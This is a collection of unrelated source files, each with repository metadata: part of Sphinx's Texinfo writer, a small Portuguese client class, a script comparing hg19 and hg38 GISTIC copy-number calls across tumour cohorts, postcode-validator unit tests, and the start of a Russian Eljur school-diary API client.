self.body.append('\n')
for id in node.get('ids'):
self.add_anchor(id, node)
self.escape_newlines += 1
def depart_citation(self, node: Element) -> None:
self.escape_newlines -= 1
def visit_citation_reference(self, node: Element) -> None:
self.body.append('@w{[')
def depart_citation_reference(self, node: Element) -> None:
self.body.append(']}')
# -- Lists
def visit_bullet_list(self, node: Element) -> None:
bullet = node.get('bullet', '*')
self.body.append('\n\n@itemize %s\n' % bullet)
def depart_bullet_list(self, node: Element) -> None:
self.ensure_eol()
self.body.append('@end itemize\n')
def visit_enumerated_list(self, node: Element) -> None:
# doesn't support Roman numerals
enum = node.get('enumtype', 'arabic')
starters = {'arabic': '',
'loweralpha': 'a',
'upperalpha': 'A'}
start = node.get('start', starters.get(enum, ''))
self.body.append('\n\n@enumerate %s\n' % start)
def depart_enumerated_list(self, node: Element) -> None:
self.ensure_eol()
self.body.append('@end enumerate\n')
def visit_list_item(self, node: Element) -> None:
self.body.append('\n@item ')
def depart_list_item(self, node: Element) -> None:
pass
# -- Option List
def visit_option_list(self, node: Element) -> None:
self.body.append('\n\n@table @option\n')
def depart_option_list(self, node: Element) -> None:
self.ensure_eol()
self.body.append('@end table\n')
def visit_option_list_item(self, node: Element) -> None:
pass
def depart_option_list_item(self, node: Element) -> None:
pass
def visit_option_group(self, node: Element) -> None:
self.at_item_x = '@item'
def depart_option_group(self, node: Element) -> None:
pass
def visit_option(self, node: Element) -> None:
self.escape_hyphens += 1
self.body.append('\n%s ' % self.at_item_x)
self.at_item_x = '@itemx'
def depart_option(self, node: Element) -> None:
self.escape_hyphens -= 1
def visit_option_string(self, node: Element) -> None:
pass
def depart_option_string(self, node: Element) -> None:
pass
def visit_option_argument(self, node: Element) -> None:
self.body.append(node.get('delimiter', ' '))
def depart_option_argument(self, node: Element) -> None:
pass
def visit_description(self, node: Element) -> None:
self.body.append('\n')
def depart_description(self, node: Element) -> None:
pass
# -- Definitions
def visit_definition_list(self, node: Element) -> None:
self.body.append('\n\n@table @asis\n')
def depart_definition_list(self, node: Element) -> None:
self.ensure_eol()
self.body.append('@end table\n')
def visit_definition_list_item(self, node: Element) -> None:
self.at_item_x = '@item'
def depart_definition_list_item(self, node: Element) -> None:
pass
def visit_term(self, node: Element) -> None:
for id in node.get('ids'):
self.add_anchor(id, node)
# anchors and indexes need to go in front
for n in node[::]:
if isinstance(n, (addnodes.index, nodes.target)):
n.walkabout(self)
node.remove(n)
self.body.append('\n%s ' % self.at_item_x)
self.at_item_x = '@itemx'
def depart_term(self, node: Element) -> None:
pass
def visit_classifier(self, node: Element) -> None:
self.body.append(' : ')
def depart_classifier(self, node: Element) -> None:
pass
def visit_definition(self, node: Element) -> None:
self.body.append('\n')
def depart_definition(self, node: Element) -> None:
pass
# -- Tables
def visit_table(self, node: Element) -> None:
self.entry_sep = '@item'
def depart_table(self, node: Element) -> None:
self.body.append('\n@end multitable\n\n')
def visit_tabular_col_spec(self, node: Element) -> None:
pass
def depart_tabular_col_spec(self, node: Element) -> None:
pass
def visit_colspec(self, node: Element) -> None:
self.colwidths.append(node['colwidth'])
if len(self.colwidths) != self.n_cols:
return
self.body.append('\n\n@multitable ')
for n in self.colwidths:
self.body.append('{%s} ' % ('x' * (n + 2)))
def depart_colspec(self, node: Element) -> None:
pass
def visit_tgroup(self, node: Element) -> None:
self.colwidths = []
self.n_cols = node['cols']
def depart_tgroup(self, node: Element) -> None:
pass
def visit_thead(self, node: Element) -> None:
self.entry_sep = '@headitem'
def depart_thead(self, node: Element) -> None:
pass
def visit_tbody(self, node: Element) -> None:
pass
def depart_tbody(self, node: Element) -> None:
pass
def visit_row(self, node: Element) -> None:
pass
def depart_row(self, node: Element) -> None:
self.entry_sep = '@item'
def visit_entry(self, node: Element) -> None:
self.body.append('\n%s\n' % self.entry_sep)
self.entry_sep = '@tab'
def depart_entry(self, node: Element) -> None:
for _i in range(node.get('morecols', 0)):
self.body.append('\n@tab\n')
# -- Field Lists
def visit_field_list(self, node: Element) -> None:
pass
def depart_field_list(self, node: Element) -> None:
pass
def visit_field(self, node: Element) -> None:
self.body.append('\n')
def depart_field(self, node: Element) -> None:
self.body.append('\n')
def visit_field_name(self, node: Element) -> None:
self.ensure_eol()
self.body.append('@*')
def depart_field_name(self, node: Element) -> None:
self.body.append(': ')
def visit_field_body(self, node: Element) -> None:
pass
def depart_field_body(self, node: Element) -> None:
pass
# -- Admonitions
def visit_admonition(self, node: Element, name: str = '') -> None:
if not name:
title = cast(nodes.title, node[0])
name = self.escape(title.astext())
self.body.append('\n@cartouche\n@quotation %s ' % name)
def _visit_named_admonition(self, node: Element) -> None:
label = admonitionlabels[node.tagname]
self.body.append('\n@cartouche\n@quotation %s ' % label)
def depart_admonition(self, node: Element) -> None:
self.ensure_eol()
self.body.append('@end quotation\n'
'@end cartouche\n')
visit_attention = _visit_named_admonition
depart_attention = depart_admonition
visit_caution = _visit_named_admonition
depart_caution = depart_admonition
visit_danger = _visit_named_admonition
depart_danger = depart_admonition
visit_error = _visit_named_admonition
depart_error = depart_admonition
visit_hint = _visit_named_admonition
depart_hint = depart_admonition
visit_important = _visit_named_admonition
depart_important = depart_admonition
visit_note = _visit_named_admonition
depart_note = depart_admonition
visit_tip = _visit_named_admonition
depart_tip = depart_admonition
visit_warning = _visit_named_admonition
depart_warning = depart_admonition
# -- Misc
def visit_docinfo(self, node: Element) -> None:
raise nodes.SkipNode
def visit_generated(self, node: Element) -> None:
raise nodes.SkipNode
def visit_header(self, node: Element) -> None:
raise nodes.SkipNode
def visit_footer(self, node: Element) -> None:
raise nodes.SkipNode
def visit_container(self, node: Element) -> None:
if node.get('literal_block'):
self.body.append('\n\n@float LiteralBlock\n')
def depart_container(self, node: Element) -> None:
if node.get('literal_block'):
self.body.append('\n@end float\n\n')
def visit_decoration(self, node: Element) -> None:
pass
def depart_decoration(self, node: Element) -> None:
pass
def visit_topic(self, node: Element) -> None:
# ignore TOC's since we have to have a "menu" anyway
if 'contents' in node.get('classes', []):
raise nodes.SkipNode
title = cast(nodes.title, node[0])
self.visit_rubric(title)
self.body.append('%s\n' % self.escape(title.astext()))
self.depart_rubric(title)
def depart_topic(self, node: Element) -> None:
pass
def visit_transition(self, node: Element) -> None:
self.body.append('\n\n%s\n\n' % ('_' * 66))
def depart_transition(self, node: Element) -> None:
pass
def visit_attribution(self, node: Element) -> None:
self.body.append('\n\n@center --- ')
def depart_attribution(self, node: Element) -> None:
self.body.append('\n\n')
def visit_raw(self, node: Element) -> None:
format = node.get('format', '').split()
if 'texinfo' in format or 'texi' in format:
self.body.append(node.astext())
raise nodes.SkipNode
def visit_figure(self, node: Element) -> None:
self.body.append('\n\n@float Figure\n')
def depart_figure(self, node: Element) -> None:
self.body.append('\n@end float\n\n')
def visit_caption(self, node: Element) -> None:
if (isinstance(node.parent, nodes.figure) or
(isinstance(node.parent, nodes.container) and
node.parent.get('literal_block'))):
self.body.append('\n@caption{')
else:
logger.warning(__('caption not inside a figure.'),
location=node)
def depart_caption(self, node: Element) -> None:
if (isinstance(node.parent, nodes.figure) or
(isinstance(node.parent, nodes.container) and
node.parent.get('literal_block'))):
self.body.append('}\n')
def visit_image(self, node: Element) -> None:
if node['uri'] in self.builder.images:
uri = self.builder.images[node['uri']]
else:
# missing image!
if self.ignore_missing_images:
return
uri = node['uri']
if uri.find('://') != -1:
# ignore remote images
return
name, ext = path.splitext(uri)
# width and height ignored in non-tex output
width = self.tex_image_length(node.get('width', ''))
height = self.tex_image_length(node.get('height', ''))
alt = self.escape_arg(node.get('alt', ''))
filename = "%s-figures/%s" % (self.elements['filename'][:-5], name) # type: ignore
self.body.append('\n@image{%s,%s,%s,%s,%s}\n' %
(filename, width, height, alt, ext[1:]))
def depart_image(self, node: Element) -> None:
pass
def visit_compound(self, node: Element) -> None:
pass
def depart_compound(self, node: Element) -> None:
pass
def visit_sidebar(self, node: Element) -> None:
self.visit_topic(node)
def depart_sidebar(self, node: Element) -> None:
self.depart_topic(node)
def visit_label(self, node: Element) -> None:
# label numbering is automatically generated by Texinfo
if self.in_footnote:
raise nodes.SkipNode
else:
self.body.append('@w{(')
def depart_label(self, node: Element) -> None:
self.body.append(')} ')
def visit_legend(self, node: Element) -> None:
pass
def depart_legend(self, node: Element) -> None:
pass
def visit_substitution_reference(self, node: Element) -> None:
pass
def depart_substitution_reference(self, node: Element) -> None:
pass
def visit_substitution_definition(self, node: Element) -> None:
raise nodes.SkipNode
def visit_system_message(self, node: Element) -> None:
self.body.append('\n@verbatim\n'
'<SYSTEM MESSAGE: %s>\n'
'@end verbatim\n' % node.astext())
raise nodes.SkipNode
def visit_comment(self, node: Element) -> None:
self.body.append('\n')
for line in node.astext().splitlines():
self.body.append('@c %s\n' % line)
raise nodes.SkipNode
def visit_problematic(self, node: Element) -> None:
self.body.append('>>')
def depart_problematic(self, node: Element) -> None:
self.body.append('<<')
def unimplemented_visit(self, node: Element) -> None:
logger.warning(__("unimplemented node type: %r"), node,
location=node)
def unknown_departure(self, node: Node) -> None:
pass
# -- Sphinx specific
def visit_productionlist(self, node: Element) -> None:
self.visit_literal_block(None)
names = []
productionlist = cast(Iterable[addnodes.production], node)
for production in productionlist:
names.append(production['tokenname'])
maxlen = max(len(name) for name in names)
for production in productionlist:
if production['tokenname']:
for id in production.get('ids'):
self.add_anchor(id, production)
s = production['tokenname'].ljust(maxlen) + ' ::='
else:
s = '%s ' % (' ' * maxlen)
self.body.append(self.escape(s))
self.body.append(self.escape(production.astext() + '\n'))
self.depart_literal_block(None)
raise nodes.SkipNode
def visit_production(self, node: Element) -> None:
pass
def depart_production(self, node: Element) -> None:
pass
def visit_literal_emphasis(self, node: Element) -> None:
self.body.append('@code{')
def depart_literal_emphasis(self, node: Element) -> None:
self.body.append('}')
def visit_literal_strong(self, node: Element) -> None:
self.body.append('@code{')
def depart_literal_strong(self, node: Element) -> None:
self.body.append('}')
def visit_index(self, node: Element) -> None:
# terminate the line but don't prevent paragraph breaks
if isinstance(node.parent, nodes.paragraph):
self.ensure_eol()
else:
self.body.append('\n')
for entry in node['entries']:
typ, text, tid, text2, key_ = entry
text = self.escape_menu(text)
self.body.append('@geindex %s\n' % text)
def visit_versionmodified(self, node: Element) -> None:
self.body.append('\n')
def depart_versionmodified(self, node: Element) -> None:
self.body.append('\n')
def visit_start_of_file(self, node: Element) -> None:
# add a document target
self.next_section_ids.add(':doc')
self.curfilestack.append(node['docname'])
self.footnotestack.append(self.collect_footnotes(node))
def depart_start_of_file(self, node: Element) -> None:
self.curfilestack.pop()
self.footnotestack.pop()
def visit_centered(self, node: Element) -> None:
txt = self.escape_arg(node.astext())
self.body.append('\n\n@center %s\n\n' % txt)
raise nodes.SkipNode
def visit_seealso(self, node: Element) -> None:
self.body.append('\n\n@subsubheading %s\n\n' %
admonitionlabels['seealso'])
def depart_seealso(self, node: Element) -> None:
self.body.append('\n')
def visit_meta(self, node: Element) -> None:
raise nodes.SkipNode
def visit_glossary(self, node: Element) -> None:
pass
def depart_glossary(self, node: Element) -> None:
pass
def visit_acks(self, node: Element) -> None:
bullet_list = cast(nodes.bullet_list, node[0])
list_items = cast(Iterable[nodes.list_item], bullet_list)
self.body.append('\n\n')
self.body.append(', '.join(n.astext() for n in list_items) + '.')
self.body.append('\n\n')
raise nodes.SkipNode
#############################################################
# Domain-specific object descriptions
#############################################################
# Top-level nodes for descriptions
##################################
def visit_desc(self, node: addnodes.desc) -> None:
self.descs.append(node)
self.at_deffnx = '@deffn'
def depart_desc(self, node: addnodes.desc) -> None:
self.descs.pop()
self.ensure_eol()
self.body.append('@end deffn\n')
def visit_desc_signature(self, node: Element) -> None:
self.escape_hyphens += 1
objtype = node.parent['objtype']
if objtype != 'describe':
for id in node.get('ids'):
self.add_anchor(id, node)
# use the full name of the objtype for the category
try:
domain = self.builder.env.get_domain(node.parent['domain'])
name = domain.get_type_name(domain.object_types[objtype],
self.config.primary_domain == domain.name)
except (KeyError, ExtensionError):
name = objtype
# by convention, the deffn category should be capitalized like a title
category = self.escape_arg(smart_capwords(name))
self.body.append('\n%s {%s} ' % (self.at_deffnx, category))
self.at_deffnx = '@deffnx'
self.desc_type_name = name
def depart_desc_signature(self, node: Element) -> None:
self.body.append("\n")
self.escape_hyphens -= 1
self.desc_type_name = None
def visit_desc_signature_line(self, node: Element) -> None:
pass
def depart_desc_signature_line(self, node: Element) -> None:
pass
def visit_desc_content(self, node: Element) -> None:
pass
def depart_desc_content(self, node: Element) -> None:
pass
def visit_desc_inline(self, node: Element) -> None:
pass
def depart_desc_inline(self, node: Element) -> None:
pass
# Nodes for high-level structure in signatures
##############################################
def visit_desc_name(self, node: Element) -> None:
pass
def depart_desc_name(self, node: Element) -> None:
pass
def visit_desc_addname(self, node: Element) -> None:
pass
def depart_desc_addname(self, node: Element) -> None:
pass
def visit_desc_type(self, node: Element) -> None:
pass
def depart_desc_type(self, node: Element) -> None:
pass
def visit_desc_returns(self, node: Element) -> None:
self.body.append(' -> ')
def depart_desc_returns(self, node: Element) -> None:
pass
def visit_desc_parameterlist(self, node: Element) -> None:
self.body.append(' (')
self.first_param = 1
def depart_desc_parameterlist(self, node: Element) -> None:
self.body.append(')')
def visit_desc_parameter(self, node: Element) -> None:
if not self.first_param:
self.body.append(', ')
else:
self.first_param = 0
text = self.escape(node.astext())
# replace no-break spaces with normal ones
text = text.replace(' ', '@w{ }')
self.body.append(text)
raise nodes.SkipNode
def visit_desc_optional(self, node: Element) -> None:
self.body.append('[')
def depart_desc_optional(self, node: Element) -> None:
self.body.append(']')
def visit_desc_annotation(self, node: Element) -> None:
# Try to avoid duplicating info already displayed by the deffn category.
# e.g.
# @deffn {Class} Foo
# -- instead of --
# @deffn {Class} class Foo
txt = node.astext().strip()
if ((self.descs and txt == self.descs[-1]['objtype']) or
(self.desc_type_name and txt in self.desc_type_name.split())):
raise nodes.SkipNode
def depart_desc_annotation(self, node: Element) -> None:
pass
##############################################
def visit_inline(self, node: Element) -> None:
pass
def depart_inline(self, node: Element) -> None:
pass
def visit_abbreviation(self, node: Element) -> None:
abbr = node.astext()
self.body.append('@abbr{')
if node.hasattr('explanation') and abbr not in self.handled_abbrs:
self.context.append(',%s}' % self.escape_arg(node['explanation']))
self.handled_abbrs.add(abbr)
else:
self.context.append('}')
def depart_abbreviation(self, node: Element) -> None:
self.body.append(self.context.pop())
def visit_manpage(self, node: Element) -> None:
return self.visit_literal_emphasis(node)
def depart_manpage(self, node: Element) -> None:
return self.depart_literal_emphasis(node)
def visit_download_reference(self, node: Element) -> None:
pass
def depart_download_reference(self, node: Element) -> None:
pass
def visit_hlist(self, node: Element) -> None:
self.visit_bullet_list(node)
def depart_hlist(self, node: Element) -> None:
self.depart_bullet_list(node)
def visit_hlistcol(self, node: Element) -> None:
pass
def depart_hlistcol(self, node: Element) -> None:
pass
def visit_pending_xref(self, node: Element) -> None:
pass
def depart_pending_xref(self, node: Element) -> None:
pass
def visit_math(self, node: Element) -> None:
self.body.append('@math{' + self.escape_arg(node.astext()) + '}')
raise nodes.SkipNode
def visit_math_block(self, node: Element) -> None:
if node.get('label'):
self.add_anchor(node['label'], node)
self.body.append('\n\n@example\n%s\n@end example\n\n' %
self.escape_arg(node.astext()))
raise nodes.SkipNode
@property
def desc(self) -> Optional[addnodes.desc]:
warnings.warn('TexinfoWriter.desc is deprecated.', RemovedInSphinx50Warning)
if len(self.descs):
return self.descs[-1]
else:
return None
| 33.919263 | 107 | 0.571643 | [
"BSD-2-Clause"
] | Bibo-Joshi/sphinx | sphinx/writers/texinfo.py | 53,356 | Python |
class Pessoa:
def __init__(self, nome, idade):
self._nome = nome
self._idade = idade
@property
def nome(self):
return self._nome
@property
def idade(self):
return self._idade
class Cliente(Pessoa):
def __init__(self, nome, idade):
super().__init__(nome, idade)
self.conta = None
def inserir_conta(self, tipo_conta):
self.conta = tipo_conta
return
| 17.84 | 40 | 0.59417 | [
"MIT"
] | renatodev95/Python | aprendizado/udemy/03_desafio_POO/cliente.py | 446 | Python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 22 17:28:54 2018
@author: galengao
This is the original analysis code as it exists in the environment where it was writen and initially run.
Portions and modifications of this script constitute all other .py scripts in this directory.
"""
import numpy as np
import pandas as pd
from collections import Counter
import matplotlib.pyplot as plt
import seaborn as sns
### Helper Function to Load in the Data ###
def load_data(coh, thresh=False):
"""Load in the hg38 and hg19 gistic thresholded data. Assume GISTIC runs
for each tumor type live in a parent directory (hg38_gistic or hg19_gistic)
one level up from this script."""
if thresh:
hg38 = '../hg38_gistic/'+coh+'/all_thresholded.by_genes.txt'
hg19 = '../hg19_gistic/'+coh+'/all_thresholded.by_genes.txt'
hg38drops = ['Cytoband', 'Locus ID']
else:
hg38 = '../hg38_gistic/'+coh+'/all_data_by_genes.txt'
hg19 = '../hg19_gistic/'+coh+'/all_data_by_genes.txt'
hg38drops = ['Cytoband', 'Gene ID']
df_hg19 = pd.read_table(hg19, index_col=[0]).drop(['Cytoband', 'Locus ID'], axis=1)
df_hg38 = pd.read_table(hg38, index_col=[0]).drop(hg38drops, axis=1)
same_samps = list(set(df_hg38.columns) & set(df_hg19.columns))
same_genes = list(set(df_hg38.index) & set(df_hg19.index))
print(coh, len(same_genes), len(same_samps))
return df_hg38[same_samps].T[same_genes], df_hg19[same_samps].T[same_genes]
return df_hg38, df_hg19
### Raw Copy Number Values Analysis Code ###
def raw_value_comparison(coh, plot=False):
"""Return the average differences in raw copy number values between the
gene-level calls in hg19 and hg38 for each gene for a given tumor type
'coh.' If plot=True, plot the genes' differences in a histogram."""
# load in the data
df_38, df_19 = load_data(coh, thresh=False)
# compute average sample-by-sample differences for each gene
df_s = df_38 - df_19
avg_diff = {g:np.average(df_s[g]) for g in df_s.columns.get_level_values('Gene Symbol')}
# take note of which genes are altered more than our threshold of 4*std
results = []
std = np.std([avg_diff[x] for x in avg_diff])
for g in avg_diff:
if avg_diff[g] > 4 * std:
results.append([coh, 'Pos', g, avg_diff[g]])
elif avg_diff[g] < -4 * std:
results.append([coh, 'Neg', g, avg_diff[g]])
if plot:
plt.hist([avg_diff[x] for x in avg_diff], bins=1000)
plt.title(coh, fontsize=16)
plt.xlabel('Average CN Difference Between Alignments', fontsize=14)
plt.ylabel('Genes', fontsize=14)
sns.despine()
plt.savefig('./genehists/'+coh+'_genehist.pdf')
plt.savefig('./genehists/'+coh+'_genehist.png')
plt.clf()
return results
def sequential_cohort_test_raw_values(cohs, plot=False):
"""Sequentially compare raw gene-level calls for the given tumor types."""
c_results = []
for coh in cohs: # perform raw value comparison for each cohort
c_results += raw_value_comparison(coh, plot=plot)
# compile results together
df_r = pd.DataFrame(c_results, columns=['Cohort', 'Direction', 'Gene', 'Difference'])
gcount = Counter(df_r['Gene'])
pos_gcount = Counter(df_r[df_r['Direction']=='Pos']['Gene'])
neg_gcount = Counter(df_r[df_r['Direction']=='Neg']['Gene'])
df = pd.DataFrame([gcount[x] for x in gcount], index=gcount.keys(), columns=['Count'])
df['Count_pos'] = [pos_gcount[x] if x in pos_gcount else 0 for x in gcount]
df['Count_neg'] = [neg_gcount[x] if x in neg_gcount else 0 for x in gcount]
if plot: # write output
plt.plot(np.sort([gcount[x] for x in gcount])[::-1], 'b-')
plt.xlabel('Gene by Rank', fontsize=16)
plt.ylabel('Number of Occurences', fontsize=16)
sns.despine()
plt.savefig('GeneDevianceDropoff.pdf')
plt.savefig('GeneDevianceDropoff.png')
df_r.to_csv('./genehists/LargestDifferences.tsv', sep='\t', index=False)
df.to_csv('./genehists/LargestDifferenceGenes_ByCount.tsv', sep='\t', index=True)
### Thresholded Copy Number Values Analysis Code ###
def thresholded_value_comparison(df_hg38, df_hg19, metric='hamming'):
"""Compare -2,-1,0,1,2 gene-level thresholded calls. metric can be either
hamming (number of discrepancies in each gene) or manhattan (sum of
'distances' between each gene so a 1 to -1 change is 2). Returns a vector
of each gene's metric."""
out = []
for i, g in enumerate(df_hg38.columns):
if metric == 'hamming':
out.append(sum(df_hg19[g] != df_hg38[g])/len(df_hg19))
elif metric == 'manhattan':
out.append(sum(abs((df_hg19[g] - df_hg38[g]))))
return pd.DataFrame(out, index=df_hg38.columns)
def sequential_cohort_test_thresholded_values(cohs):
"""Compare thresholded gene-level calls for input tumor types."""
df_out = pd.DataFrame([])
for coh in cohs:
df_hg38, df_hg19 = load_data(coh, thresh=True)
df_results = thresholded_value_comparison(df_hg38, df_hg19, metric='hamming')
df_results.columns = [coh]
df_out = df_out.join(df_results, how='outer')
df_out.to_csv('../readout/DiscordantSampleFractions_perGene_perCohort_thresholdedCalls.tsv', sep='\t')
return df_out
def plot_fractionDisagreements_perCohort(cohs):
"""Visualize fraction of samples with disagreements in thresholded copy
number for each gene. Run sequential_cohort_test_thresholded_values()
before this function."""
# Read in data written by sequential_cohort_test_thresholded_values
df = sequential_cohort_test_thresholded_values(cohs)
df_box = pd.melt(df.reset_index(), id_vars='Gene Symbol').set_index('Gene Symbol')
df_box.columns = ['Tumor Type', 'Fraction of Samples with Disagreements']
dft = df.T
dft['med_degenerates'] = df.median(axis=0)
boxorder = dft.sort_values('med_degenerates', axis=0).index
# read in copy number burden data (requires aneuploidy RecurrentSCNA calls)
df_cn = pd.read_table('../../PanCanAneuploidy/bin/PANCAN_armonly_ASandpuritycalls_092817_xcellcalls.txt', index_col=0, usecols=[0,1,2,16])
coh_medians = [int(np.median(df_cn[df_cn['Type']==x]['RecurrentSCNA'].dropna())) for x in df_cn.Type.unique()]
df_med = pd.DataFrame(coh_medians, index=df_cn.Type.unique(), columns=['med'])
# plot it out
pal = sns.color_palette('Blues', max(df_med.med)-min(df_med.med)+1)
my_pal = {c: pal[df_med.at[c,'med']] for c in df_med.index}
g = sns.boxplot(x=df_box.columns[0], y=df_box.columns[1], data=df_box, \
order=boxorder, fliersize=1, palette=my_pal, linewidth=0.5)
newxticks = [x+' ('+str(df_med.loc[x]['med'])+')' for x in boxorder]
g.set_xticklabels(newxticks, rotation=90)
plt.ylabel('Fraction with Disagreements', fontsize=12)
sns.despine()
plt.gcf().set_size_inches((8,3))
plt.savefig('2_thresholdedCN_boxplot.pdf', bbox_inches='tight')
plt.savefig('2_thresholdedCN_boxplot.png', bbox_inches='tight')
### Significantly Altered Focal Peaks Analysis Code ###
def peakgene_overlaps(combos, same_genes, normalize=False):
"""Count the number of genes that overlap when examing the hg19 & hg38
GISTIC runs' focal peaks."""
venn_numbers, gsu, gsi = [], [], []
for coh, ad in combos:
print(coh)
# put all significant genes in a list
fnames = ['../hg19_gistic/'+coh+ad+'genes.conf_99.txt', '../hg38_gistic/'+coh+ad+'genes.txt']
df38 = pd.read_table(fnames[0], index_col=0).drop(['q value','residual q value','wide peak boundaries'])
df19 = pd.read_table(fnames[1], index_col=0).drop(['q value','residual q value','wide peak boundaries'])
g_38 = set([x for col in df38.columns for x in df38[col].dropna()]) & same_genes
g_19 = set([x for col in df19.columns for x in df19[col].dropna()]) & same_genes
intersect, union = g_38 & g_19, g_38 | g_19
gsu.append(union)
gsi.append(intersect)
if normalize:
venn_numbers.append([len(g_19-intersect)/len(union),len(intersect)/len(union), len(g_38-intersect)/len(union)])
else:
venn_numbers.append([len(g_19-intersect),len(intersect), len(g_38-intersect)])
index = [x[0]+'_'+x[1][1:-1] for x in combos]
return pd.DataFrame(venn_numbers, index=index, columns=['hg19 only','Intersection','hg38 only'])
def plot_peakgene_overlaps(combos, same_genes, write=False):
"""Visualize the results of peakgene_overlaps function in bargraph form."""
df_out = peakgene_overlaps(combos, same_genes, normalize=False)
df_d, df_a = df_out[df_out.index.str.split('_').str[-1] == 'del'], \
df_out[df_out.index.str.split('_').str[-1] == 'amp']
for x in zip((df_d, df_a), ('Deletion Peak Memberships', 'Amplification Peak Memberships')):
x[0].index = x[0].index.str.split('_').str[0]
x[0].plot.bar(stacked=True, color=['#af8dc3', '#f7f7f7', '#7fbf7b'], linewidth=1, edgecolor='k')
plt.gca().set_xticklabels(x[0].index, rotation=90)
plt.title(x[1], fontsize=18)
plt.gcf().set_size_inches(10,8)
sns.despine()
plt.savefig(x[1].split(' ')[0]+'_peakMemberships.pdf', bbox_inches='tight')
plt.savefig(x[1].split(' ')[0]+'_peakMemberships.png', bbox_inches='tight')
plt.clf()
if write:
df_out.to_csv('VennStats_focalpeaks.tsv', sep='\t')
### Conservation of Significant Copy Number Driver Events Analysis Code ###
def documented_driver_differences():
"""Scan and analyze manually currated DocumentedDriverDifferences.txt file.
Returns: 1) Number of driver genes called in both hg19 & hg38 GISTIC peaks
2) Number of drivers missing in hg38 peaks that appeared in hg19 peaks and
3) Number of drivers present in hg38 peaks but absent from hg19 peaks."""
# read in table of documented driver differences
# (this table needs a manual curation to be generated)
df = pd.read_table('../DocumentedDriverDifferences.txt', index_col=0)
# process entries to have just yes/no calls (without parens & brackets)
df['hg19?'] = df['present in hg19?'].str.strip(')').str.strip('(').str.strip('[').str.strip(']')
df['hg38?'] = df['present in hg38?'].str.strip(')').str.strip('(').str.strip('[').str.strip(']')
# number of documented drivers that match in hg19 & hg38
matches = sum(df['hg19?'] == df['hg38?'])
# number of documented drivers that are in hg19 but not hg38 & vice versa
lostdrivers = len(df[(df['hg19?'] == 'yes') & (df['hg38?'] == 'no')])
recovereddrivers = len(df[(df['hg19?'] == 'no') & (df['hg38?'] == 'yes')])
# Return in order
return matches, lostdrivers, recovereddrivers
# set up the tumor types we want to analyze
cohs = ['ACC','BLCA','CESC','CHOL','COAD','DLBC','ESCA','GBM', 'HNSC','KICH',\
'KIRC','KIRP','LAML','LGG','LIHC','LUAD','LUSC','OV','PAAD','PCPG',\
'PRAD','READ','SARC','SKCM','STAD','TGCT','THCA','THYM','UCEC','UCS','UVM']
ads = ['/amp_', '/del_']
combos = [(c, a) for c in cohs for a in ads]
# grab list of genes present in both hg19 & hg38
df_hg38 = pd.read_table('../hg38_gistic/CHOL/all_thresholded.by_genes.txt', index_col=0, usecols=[0,1])
df_hg19 = pd.read_table('../hg19_gistic/CHOL/all_thresholded.by_genes.txt', index_col=0, usecols=[0,1])
same_genes = set(df_hg38.index) & set(df_hg19.index)
# action lines -- run the analysis
sequential_cohort_test_raw_values(cohs, plot=True)
plot_fractionDisagreements_perCohort(cohs)
plot_peakgene_overlaps(combos, same_genes, write=True)
print(documented_driver_differences())
| 47.773279 | 142 | 0.667627 | [
"MIT"
] | gaog94/GDAN_QC_CopyNumber | scripts/AnalysisCode.py | 11,800 | Python |
import unittest
from datatypes.exceptions import DataDoesNotMatchSchemaException
from datatypes import postcode_validator
class TestPostcodeValidation(unittest.TestCase):
def test_can_validate_postcode(self):
try:
postcode_validator.validate("WC2B6SE")
postcode_validator.validate("wc2b6se")
postcode_validator.validate("wc2b 6se")
postcode_validator.validate("Wc2b 6se")
except DataDoesNotMatchSchemaException as e:
self.fail("Could not validate postcode: " + repr(e))
def test_does_not_validate_invalid_postcode(self):
self.assertRaises(DataDoesNotMatchSchemaException, postcode_validator.validate, "sausages")
self.assertRaises(DataDoesNotMatchSchemaException, postcode_validator.validate, "")
self.assertRaises(DataDoesNotMatchSchemaException, postcode_validator.validate, 123)
def test_can_convert_postcode_to_canonical_form(self):
self.assertEqual(postcode_validator.to_canonical_form("wc2B6sE"), "WC2B 6SE")
self.assertEqual(postcode_validator.to_canonical_form('pl11aa'), 'PL1 1AA')
self.assertEqual(postcode_validator.to_canonical_form('pl132aa'), 'PL13 2AA')
self.assertEqual(postcode_validator.to_canonical_form('pl13 2aa'), 'PL13 2AA')
| 43.366667 | 99 | 0.752498 | [
"MIT"
] | LandRegistry/datatypes-alpha | tests/test_postcode_validation.py | 1,301 | Python |
from colored import fg, stylize, attr
import requests as rq
from yaspin import yaspin
version = "0.4beta"
greeting = stylize("""
╭────────────────────────────────────────────────────────────────╮
│ Добро пожаловать в │
│ _____ _ _ ____ _ ___ │
│ | ____| |(_)_ _ _ __ / ___| | |_ _| │
│ | _| | || | | | | '__| | | | | | │
│ | |___| || | |_| | | | |___| |___ | | │
│ |_____|_|/ |\__,_|_| \____|_____|___| │
│ |__/ │
│ вер. 0.6.1beta │
╰────────────────────────────────────────────────────────────────╯
""", fg("magenta"), attr("bold"))
API_URL = "https://markbook.eljur.ru/apiv3/"
DEVKEY = "9235e26e80ac2c509c48fe62db23642c"
VENDOR = "markbook"
lessons = []
time_style = fg("green") + attr("bold")
room_style = fg("yellow") + attr("bold")
day_of_week_style = fg("orange_1") + attr("bold")
non_academ_style = fg("cyan")
separator_style = fg("medium_purple_1") + attr("bold")
separator = stylize("::", separator_style)
# yakuri354 - Для обозначения времени окон
# butukay - Я бы назвал это костылём } < Немогу удалить
# yakuri354 ~> ну я согласен, но а как ещё окна отображать
lessons_time = {
"1": "08:30:00_09:10:00",
"2": "09:30:00_10:10:00",
"3": "10:20:00_11:00:00",
"4": "11:10:00_11:50:00",
"5": "12:00:00_12:40:00",
"6": "13:30:00_14:10:00",
"7": "14:20:00_15:00:00",
"8": "15:10:00_15:50:00",
"9": "16:20:00_17:00:00",
"10": "17:10:00_17:50:00",
"11": "18:00:00_18:40:00"
}
# Объект ученика
class Student:
def __init__(self, token=None, login=None):
self.token = token
self.login = login
rules_params = {
"DEVKEY": DEVKEY,
"vendor": VENDOR,
"out_format": "json",
"auth_token": self.token,
}
user_info = rq.get(API_URL + "getrules", params=rules_params).json()["response"]
if user_info["error"] is not None or "":
print("Ошибка при получении информации об ученике: " + user_info["error"])
raise LookupError(user_info["error"])
self.student_id = user_info["result"]["name"]
self.name = user_info["result"]["relations"]["students"][self.student_id]["title"]
self.grade = user_info["result"]["relations"]["students"][self.student_id]["class"]
self.city = user_info["result"]["city"]
self.email = user_info["result"]["email"]
self.fullname = user_info["result"]["title"]
